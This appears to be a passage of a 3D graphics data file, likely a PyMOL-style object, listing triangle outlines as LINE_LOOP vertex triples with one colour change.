VERTEX, 11.764, 31.312, 25.863,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.078, 31.152, 25.825,
VERTEX, 11.764, 31.312, 25.863,
VERTEX, 12.062, 30.981, 25.978,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.764, 31.312, 25.863,
VERTEX, 12.062, 30.981, 25.978,
VERTEX, 11.745, 31.146, 26.021,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.062, 30.981, 25.978,
VERTEX, 11.745, 31.146, 26.021,
VERTEX, 12.136, 30.949, 26.193,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.745, 31.146, 26.021,
VERTEX, 12.136, 30.949, 26.193,
VERTEX, 11.833, 31.111, 26.230,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.136, 30.949, 26.193,
VERTEX, 11.833, 31.111, 26.230,
VERTEX, 12.257, 31.073, 26.344,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.833, 31.111, 26.230,
VERTEX, 12.257, 31.073, 26.344,
VERTEX, 11.975, 31.226, 26.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.257, 31.073, 26.344,
VERTEX, 11.975, 31.226, 26.368,
VERTEX, 12.354, 31.281, 26.343,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.975, 31.226, 26.368,
VERTEX, 12.354, 31.281, 26.343,
VERTEX, 12.089, 31.425, 26.355,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.089, 31.425, 26.355,
VERTEX, 11.761, 31.638, 26.365,
VERTEX, 12.107, 31.591, 26.197,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.761, 31.638, 26.365,
VERTEX, 12.107, 31.591, 26.197,
VERTEX, 11.774, 31.803, 26.205,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.107, 31.591, 26.197,
VERTEX, 11.774, 31.803, 26.205,
VERTEX, 12.020, 31.627, 25.988,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.774, 31.803, 26.205,
VERTEX, 12.020, 31.627, 25.988,
VERTEX, 11.671, 31.843, 26.004,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.020, 31.627, 25.988,
VERTEX, 11.671, 31.843, 26.004,
VERTEX, 11.877, 31.511, 25.849,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.671, 31.843, 26.004,
VERTEX, 11.877, 31.511, 25.849,
VERTEX, 11.511, 31.735, 25.879,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.877, 31.511, 25.849,
VERTEX, 11.511, 31.735, 25.879,
VERTEX, 11.764, 31.312, 25.863,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.511, 31.735, 25.879,
VERTEX, 11.764, 31.312, 25.863,
VERTEX, 11.389, 31.542, 25.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.764, 31.312, 25.863,
VERTEX, 11.389, 31.542, 25.904,
VERTEX, 11.745, 31.146, 26.021,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.389, 31.542, 25.904,
VERTEX, 11.745, 31.146, 26.021,
VERTEX, 11.375, 31.378, 26.063,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.745, 31.146, 26.021,
VERTEX, 11.375, 31.378, 26.063,
VERTEX, 11.833, 31.111, 26.230,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.375, 31.378, 26.063,
VERTEX, 11.833, 31.111, 26.230,
VERTEX, 11.479, 31.338, 26.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.833, 31.111, 26.230,
VERTEX, 11.479, 31.338, 26.264,
VERTEX, 11.975, 31.226, 26.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.479, 31.338, 26.264,
VERTEX, 11.975, 31.226, 26.368,
VERTEX, 11.638, 31.445, 26.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.975, 31.226, 26.368,
VERTEX, 11.638, 31.445, 26.389,
VERTEX, 12.089, 31.425, 26.355,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.638, 31.445, 26.389,
VERTEX, 12.089, 31.425, 26.355,
VERTEX, 11.761, 31.638, 26.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.761, 31.638, 26.365,
VERTEX, 11.406, 31.881, 26.395,
VERTEX, 11.774, 31.803, 26.205,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.406, 31.881, 26.395,
VERTEX, 11.774, 31.803, 26.205,
VERTEX, 11.409, 32.048, 26.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.774, 31.803, 26.205,
VERTEX, 11.409, 32.048, 26.238,
VERTEX, 11.671, 31.843, 26.004,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.409, 32.048, 26.238,
VERTEX, 11.671, 31.843, 26.004,
VERTEX, 11.290, 32.093, 26.047,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.671, 31.843, 26.004,
VERTEX, 11.290, 32.093, 26.047,
VERTEX, 11.511, 31.735, 25.879,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.290, 32.093, 26.047,
VERTEX, 11.511, 31.735, 25.879,
VERTEX, 11.119, 31.989, 25.934,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.511, 31.735, 25.879,
VERTEX, 11.119, 31.989, 25.934,
VERTEX, 11.389, 31.542, 25.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.119, 31.989, 25.934,
VERTEX, 11.389, 31.542, 25.904,
VERTEX, 10.997, 31.797, 25.964,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.389, 31.542, 25.904,
VERTEX, 10.997, 31.797, 25.964,
VERTEX, 11.375, 31.378, 26.063,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.997, 31.797, 25.964,
VERTEX, 11.375, 31.378, 26.063,
VERTEX, 10.994, 31.630, 26.121,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.375, 31.378, 26.063,
VERTEX, 10.994, 31.630, 26.121,
VERTEX, 11.479, 31.338, 26.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.994, 31.630, 26.121,
VERTEX, 11.479, 31.338, 26.264,
VERTEX, 11.113, 31.585, 26.313,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.479, 31.338, 26.264,
VERTEX, 11.113, 31.585, 26.313,
VERTEX, 11.638, 31.445, 26.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.113, 31.585, 26.313,
VERTEX, 11.638, 31.445, 26.389,
VERTEX, 11.284, 31.689, 26.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.638, 31.445, 26.389,
VERTEX, 11.284, 31.689, 26.426,
VERTEX, 11.761, 31.638, 26.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.284, 31.689, 26.426,
VERTEX, 11.761, 31.638, 26.365,
VERTEX, 11.406, 31.881, 26.395,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.406, 31.881, 26.395,
VERTEX, 11.077, 32.103, 26.458,
VERTEX, 11.409, 32.048, 26.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.077, 32.103, 26.458,
VERTEX, 11.409, 32.048, 26.238,
VERTEX, 11.070, 32.274, 26.305,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.409, 32.048, 26.238,
VERTEX, 11.070, 32.274, 26.305,
VERTEX, 11.290, 32.093, 26.047,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.070, 32.274, 26.305,
VERTEX, 11.290, 32.093, 26.047,
VERTEX, 10.938, 32.324, 26.124,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.290, 32.093, 26.047,
VERTEX, 10.938, 32.324, 26.124,
VERTEX, 11.119, 31.989, 25.934,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.938, 32.324, 26.124,
VERTEX, 11.119, 31.989, 25.934,
VERTEX, 10.760, 32.222, 26.020,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.119, 31.989, 25.934,
VERTEX, 10.760, 32.222, 26.020,
VERTEX, 10.997, 31.797, 25.964,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.760, 32.222, 26.020,
VERTEX, 10.997, 31.797, 25.964,
VERTEX, 10.640, 32.030, 26.054,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.997, 31.797, 25.964,
VERTEX, 10.640, 32.030, 26.054,
VERTEX, 10.994, 31.630, 26.121,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.640, 32.030, 26.054,
VERTEX, 10.994, 31.630, 26.121,
VERTEX, 10.648, 31.859, 26.207,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.994, 31.630, 26.121,
VERTEX, 10.648, 31.859, 26.207,
VERTEX, 11.113, 31.585, 26.313,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.648, 31.859, 26.207,
VERTEX, 11.113, 31.585, 26.313,
VERTEX, 10.779, 31.810, 26.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.113, 31.585, 26.313,
VERTEX, 10.779, 31.810, 26.389,
VERTEX, 11.284, 31.689, 26.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.779, 31.810, 26.389,
VERTEX, 11.284, 31.689, 26.426,
VERTEX, 10.957, 31.911, 26.493,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.284, 31.689, 26.426,
VERTEX, 10.957, 31.911, 26.493,
VERTEX, 11.406, 31.881, 26.395,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.957, 31.911, 26.493,
VERTEX, 11.406, 31.881, 26.395,
VERTEX, 11.077, 32.103, 26.458,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.077, 32.103, 26.458,
VERTEX, 10.779, 32.309, 26.538,
VERTEX, 11.070, 32.274, 26.305,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.779, 32.309, 26.538,
VERTEX, 11.070, 32.274, 26.305,
VERTEX, 10.765, 32.482, 26.387,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.070, 32.274, 26.305,
VERTEX, 10.765, 32.482, 26.387,
VERTEX, 10.938, 32.324, 26.124,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.765, 32.482, 26.387,
VERTEX, 10.938, 32.324, 26.124,
VERTEX, 10.624, 32.536, 26.215,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.938, 32.324, 26.124,
VERTEX, 10.624, 32.536, 26.215,
VERTEX, 10.760, 32.222, 26.020,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.624, 32.536, 26.215,
VERTEX, 10.760, 32.222, 26.020,
VERTEX, 10.438, 32.439, 26.121,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.760, 32.222, 26.020,
VERTEX, 10.438, 32.439, 26.121,
VERTEX, 10.640, 32.030, 26.054,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.438, 32.439, 26.121,
VERTEX, 10.640, 32.030, 26.054,
VERTEX, 10.316, 32.248, 26.161,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.640, 32.030, 26.054,
VERTEX, 10.316, 32.248, 26.161,
VERTEX, 10.648, 31.859, 26.207,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.316, 32.248, 26.161,
VERTEX, 10.648, 31.859, 26.207,
VERTEX, 10.330, 32.076, 26.312,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.648, 31.859, 26.207,
VERTEX, 10.330, 32.076, 26.312,
VERTEX, 10.779, 31.810, 26.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.330, 32.076, 26.312,
VERTEX, 10.779, 31.810, 26.389,
VERTEX, 10.472, 32.022, 26.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.779, 31.810, 26.389,
VERTEX, 10.472, 32.022, 26.485,
VERTEX, 10.957, 31.911, 26.493,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.472, 32.022, 26.485,
VERTEX, 10.957, 31.911, 26.493,
VERTEX, 10.658, 32.119, 26.578,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.957, 31.911, 26.493,
VERTEX, 10.658, 32.119, 26.578,
VERTEX, 11.077, 32.103, 26.458,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.658, 32.119, 26.578,
VERTEX, 11.077, 32.103, 26.458,
VERTEX, 10.779, 32.309, 26.538,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.779, 32.309, 26.538,
VERTEX, 10.514, 32.504, 26.619,
VERTEX, 10.765, 32.482, 26.387,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.514, 32.504, 26.619,
VERTEX, 10.765, 32.482, 26.387,
VERTEX, 10.498, 32.676, 26.468,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.765, 32.482, 26.387,
VERTEX, 10.498, 32.676, 26.468,
VERTEX, 10.624, 32.536, 26.215,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.498, 32.676, 26.468,
VERTEX, 10.624, 32.536, 26.215,
VERTEX, 10.348, 32.734, 26.303,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.624, 32.536, 26.215,
VERTEX, 10.348, 32.734, 26.303,
VERTEX, 10.438, 32.439, 26.121,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.348, 32.734, 26.303,
VERTEX, 10.438, 32.439, 26.121,
VERTEX, 10.153, 32.644, 26.223,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.438, 32.439, 26.121,
VERTEX, 10.153, 32.644, 26.223,
VERTEX, 10.316, 32.248, 26.161,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.153, 32.644, 26.223,
VERTEX, 10.316, 32.248, 26.161,
VERTEX, 10.026, 32.459, 26.272,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.316, 32.248, 26.161,
VERTEX, 10.026, 32.459, 26.272,
VERTEX, 10.330, 32.076, 26.312,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.026, 32.459, 26.272,
VERTEX, 10.330, 32.076, 26.312,
VERTEX, 10.043, 32.287, 26.424,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.330, 32.076, 26.312,
VERTEX, 10.043, 32.287, 26.424,
VERTEX, 10.472, 32.022, 26.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.043, 32.287, 26.424,
VERTEX, 10.472, 32.022, 26.485,
VERTEX, 10.193, 32.229, 26.588,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.472, 32.022, 26.485,
VERTEX, 10.193, 32.229, 26.588,
VERTEX, 10.658, 32.119, 26.578,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.193, 32.229, 26.588,
VERTEX, 10.658, 32.119, 26.578,
VERTEX, 10.388, 32.319, 26.669,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.658, 32.119, 26.578,
VERTEX, 10.388, 32.319, 26.669,
VERTEX, 10.779, 32.309, 26.538,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.388, 32.319, 26.669,
VERTEX, 10.779, 32.309, 26.538,
VERTEX, 10.514, 32.504, 26.619,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.514, 32.504, 26.619,
VERTEX, 10.285, 32.691, 26.685,
VERTEX, 10.498, 32.676, 26.468,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.285, 32.691, 26.685,
VERTEX, 10.498, 32.676, 26.468,
VERTEX, 10.270, 32.858, 26.528,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.498, 32.676, 26.468,
VERTEX, 10.270, 32.858, 26.528,
VERTEX, 10.348, 32.734, 26.303,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.270, 32.858, 26.528,
VERTEX, 10.348, 32.734, 26.303,
VERTEX, 10.114, 32.921, 26.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.348, 32.734, 26.303,
VERTEX, 10.114, 32.921, 26.373,
VERTEX, 10.153, 32.644, 26.223,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.114, 32.921, 26.373,
VERTEX, 10.153, 32.644, 26.223,
VERTEX, 9.907, 32.842, 26.309,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.153, 32.644, 26.223,
VERTEX, 9.907, 32.842, 26.309,
VERTEX, 10.026, 32.459, 26.272,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.907, 32.842, 26.309,
VERTEX, 10.026, 32.459, 26.272,
VERTEX, 9.772, 32.669, 26.375,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.026, 32.459, 26.272,
VERTEX, 9.772, 32.669, 26.375,
VERTEX, 10.043, 32.287, 26.424,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.772, 32.669, 26.375,
VERTEX, 10.043, 32.287, 26.424,
VERTEX, 9.787, 32.501, 26.531,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.043, 32.287, 26.424,
VERTEX, 9.787, 32.501, 26.531,
VERTEX, 10.193, 32.229, 26.588,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.787, 32.501, 26.531,
VERTEX, 10.193, 32.229, 26.588,
VERTEX, 9.944, 32.439, 26.687,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.193, 32.229, 26.588,
VERTEX, 9.944, 32.439, 26.687,
VERTEX, 10.388, 32.319, 26.669,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.944, 32.439, 26.687,
VERTEX, 10.388, 32.319, 26.669,
VERTEX, 10.150, 32.517, 26.751,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.388, 32.319, 26.669,
VERTEX, 10.150, 32.517, 26.751,
VERTEX, 10.514, 32.504, 26.619,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.150, 32.517, 26.751,
VERTEX, 10.514, 32.504, 26.619,
VERTEX, 10.285, 32.691, 26.685,
END,
COLOR, 0.000, 0.843, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 10.285, 32.691, 26.685,
VERTEX, 10.094, 32.872, 26.720,
VERTEX, 10.270, 32.858, 26.528,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.094, 32.872, 26.720,
VERTEX, 10.270, 32.858, 26.528,
VERTEX, 10.084, 33.026, 26.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.270, 32.858, 26.528,
VERTEX, 10.084, 33.026, 26.550,
VERTEX, 10.114, 32.921, 26.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.084, 33.026, 26.550,
VERTEX, 10.114, 32.921, 26.373,
VERTEX, 9.921, 33.094, 26.403,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.114, 32.921, 26.373,
VERTEX, 9.921, 33.094, 26.403,
VERTEX, 9.907, 32.842, 26.309,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.921, 33.094, 26.403,
VERTEX, 9.907, 32.842, 26.309,
VERTEX, 9.702, 33.037, 26.364,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.907, 32.842, 26.309,
VERTEX, 9.702, 33.037, 26.364,
VERTEX, 9.772, 32.669, 26.375,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.702, 33.037, 26.364,
VERTEX, 9.772, 32.669, 26.375,
VERTEX, 9.555, 32.887, 26.457,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.772, 32.669, 26.375,
VERTEX, 9.555, 32.887, 26.457,
VERTEX, 9.787, 32.501, 26.531,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.555, 32.887, 26.457,
VERTEX, 9.787, 32.501, 26.531,
VERTEX, 9.565, 32.733, 26.627,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.787, 32.501, 26.531,
VERTEX, 9.565, 32.733, 26.627,
VERTEX, 9.944, 32.439, 26.687,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.565, 32.733, 26.627,
VERTEX, 9.944, 32.439, 26.687,
VERTEX, 9.728, 32.665, 26.775,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.944, 32.439, 26.687,
VERTEX, 9.728, 32.665, 26.775,
VERTEX, 10.150, 32.517, 26.751,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.728, 32.665, 26.775,
VERTEX, 10.150, 32.517, 26.751,
VERTEX, 9.947, 32.723, 26.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.150, 32.517, 26.751,
VERTEX, 9.947, 32.723, 26.813,
VERTEX, 10.285, 32.691, 26.685,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.947, 32.723, 26.813,
VERTEX, 10.285, 32.691, 26.685,
VERTEX, 10.094, 32.872, 26.720,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.094, 32.872, 26.720,
VERTEX, 9.939, 33.047, 26.708,
VERTEX, 10.084, 33.026, 26.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.939, 33.047, 26.708,
VERTEX, 10.084, 33.026, 26.550,
VERTEX, 9.932, 33.170, 26.514,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.084, 33.026, 26.550,
VERTEX, 9.932, 33.170, 26.514,
VERTEX, 9.921, 33.094, 26.403,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.932, 33.170, 26.514,
VERTEX, 9.921, 33.094, 26.403,
VERTEX, 9.765, 33.244, 26.374,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.921, 33.094, 26.403,
VERTEX, 9.765, 33.244, 26.374,
VERTEX, 9.702, 33.037, 26.364,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.765, 33.244, 26.374,
VERTEX, 9.702, 33.037, 26.364,
VERTEX, 9.536, 33.226, 26.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.702, 33.037, 26.364,
VERTEX, 9.536, 33.226, 26.372,
VERTEX, 9.555, 32.887, 26.457,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.536, 33.226, 26.372,
VERTEX, 9.555, 32.887, 26.457,
VERTEX, 9.379, 33.127, 26.507,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.555, 32.887, 26.457,
VERTEX, 9.379, 33.127, 26.507,
VERTEX, 9.565, 32.733, 26.627,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.379, 33.127, 26.507,
VERTEX, 9.565, 32.733, 26.627,
VERTEX, 9.386, 33.005, 26.701,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.565, 32.733, 26.627,
VERTEX, 9.386, 33.005, 26.701,
VERTEX, 9.728, 32.665, 26.775,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.386, 33.005, 26.701,
VERTEX, 9.728, 32.665, 26.775,
VERTEX, 9.553, 32.930, 26.840,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.728, 32.665, 26.775,
VERTEX, 9.553, 32.930, 26.840,
VERTEX, 9.947, 32.723, 26.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.553, 32.930, 26.840,
VERTEX, 9.947, 32.723, 26.813,
VERTEX, 9.782, 32.948, 26.843,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.947, 32.723, 26.813,
VERTEX, 9.782, 32.948, 26.843,
VERTEX, 10.094, 32.872, 26.720,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.782, 32.948, 26.843,
VERTEX, 10.094, 32.872, 26.720,
VERTEX, 9.939, 33.047, 26.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.939, 33.047, 26.708,
VERTEX, 9.812, 33.215, 26.639,
VERTEX, 9.932, 33.170, 26.514,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.812, 33.215, 26.639,
VERTEX, 9.932, 33.170, 26.514,
VERTEX, 9.792, 33.280, 26.420,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.932, 33.170, 26.514,
VERTEX, 9.792, 33.280, 26.420,
VERTEX, 9.765, 33.244, 26.374,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.792, 33.280, 26.420,
VERTEX, 9.765, 33.244, 26.374,
VERTEX, 9.621, 33.361, 26.290,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.765, 33.244, 26.374,
VERTEX, 9.621, 33.361, 26.290,
VERTEX, 9.536, 33.226, 26.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.621, 33.361, 26.290,
VERTEX, 9.536, 33.226, 26.372,
VERTEX, 9.400, 33.411, 26.325,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.536, 33.226, 26.372,
VERTEX, 9.400, 33.411, 26.325,
VERTEX, 9.379, 33.127, 26.507,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.400, 33.411, 26.325,
VERTEX, 9.379, 33.127, 26.507,
VERTEX, 9.258, 33.401, 26.505,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.379, 33.127, 26.507,
VERTEX, 9.258, 33.401, 26.505,
VERTEX, 9.386, 33.005, 26.701,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.258, 33.401, 26.505,
VERTEX, 9.386, 33.005, 26.701,
VERTEX, 9.278, 33.335, 26.724,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.386, 33.005, 26.701,
VERTEX, 9.278, 33.335, 26.724,
VERTEX, 9.553, 32.930, 26.840,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.278, 33.335, 26.724,
VERTEX, 9.553, 32.930, 26.840,
VERTEX, 9.449, 33.254, 26.854,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.553, 32.930, 26.840,
VERTEX, 9.449, 33.254, 26.854,
VERTEX, 9.782, 32.948, 26.843,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.449, 33.254, 26.854,
VERTEX, 9.782, 32.948, 26.843,
VERTEX, 9.670, 33.204, 26.819,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.782, 32.948, 26.843,
VERTEX, 9.670, 33.204, 26.819,
VERTEX, 9.939, 33.047, 26.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.670, 33.204, 26.819,
VERTEX, 9.939, 33.047, 26.708,
VERTEX, 9.812, 33.215, 26.639,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.812, 33.215, 26.639,
VERTEX, 9.708, 33.396, 26.517,
VERTEX, 9.792, 33.280, 26.420,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.708, 33.396, 26.517,
VERTEX, 9.792, 33.280, 26.420,
VERTEX, 9.648, 33.399, 26.295,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.792, 33.280, 26.420,
VERTEX, 9.648, 33.399, 26.295,
VERTEX, 9.621, 33.361, 26.290,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.648, 33.399, 26.295,
VERTEX, 9.621, 33.361, 26.290,
VERTEX, 9.474, 33.489, 26.175,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.621, 33.361, 26.290,
VERTEX, 9.474, 33.489, 26.175,
VERTEX, 9.400, 33.411, 26.325,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.474, 33.489, 26.175,
VERTEX, 9.400, 33.411, 26.325,
VERTEX, 9.288, 33.612, 26.227,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.400, 33.411, 26.325,
VERTEX, 9.288, 33.612, 26.227,
VERTEX, 9.258, 33.401, 26.505,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.288, 33.612, 26.227,
VERTEX, 9.258, 33.401, 26.505,
VERTEX, 9.199, 33.698, 26.420,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.258, 33.401, 26.505,
VERTEX, 9.199, 33.698, 26.420,
VERTEX, 9.278, 33.335, 26.724,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.199, 33.698, 26.420,
VERTEX, 9.278, 33.335, 26.724,
VERTEX, 9.258, 33.694, 26.642,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.278, 33.335, 26.724,
VERTEX, 9.258, 33.694, 26.642,
VERTEX, 9.449, 33.254, 26.854,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.258, 33.694, 26.642,
VERTEX, 9.449, 33.254, 26.854,
VERTEX, 9.432, 33.605, 26.762,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.449, 33.254, 26.854,
VERTEX, 9.432, 33.605, 26.762,
VERTEX, 9.670, 33.204, 26.819,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.432, 33.605, 26.762,
VERTEX, 9.670, 33.204, 26.819,
VERTEX, 9.618, 33.481, 26.710,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.670, 33.204, 26.819,
VERTEX, 9.618, 33.481, 26.710,
VERTEX, 9.812, 33.215, 26.639,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.618, 33.481, 26.710,
VERTEX, 9.812, 33.215, 26.639,
VERTEX, 9.708, 33.396, 26.517,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.708, 33.396, 26.517,
VERTEX, 9.641, 33.616, 26.328,
VERTEX, 9.648, 33.399, 26.295,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.641, 33.616, 26.328,
VERTEX, 9.648, 33.399, 26.295,
VERTEX, 9.533, 33.581, 26.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.648, 33.399, 26.295,
VERTEX, 9.533, 33.581, 26.128,
VERTEX, 9.474, 33.489, 26.175,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.533, 33.581, 26.128,
VERTEX, 9.474, 33.489, 26.175,
VERTEX, 9.356, 33.680, 26.019,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.474, 33.489, 26.175,
VERTEX, 9.356, 33.680, 26.019,
VERTEX, 9.288, 33.612, 26.227,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.356, 33.680, 26.019,
VERTEX, 9.288, 33.612, 26.227,
VERTEX, 9.215, 33.855, 26.065,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.288, 33.612, 26.227,
VERTEX, 9.215, 33.855, 26.065,
VERTEX, 9.199, 33.698, 26.420,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.215, 33.855, 26.065,
VERTEX, 9.199, 33.698, 26.420,
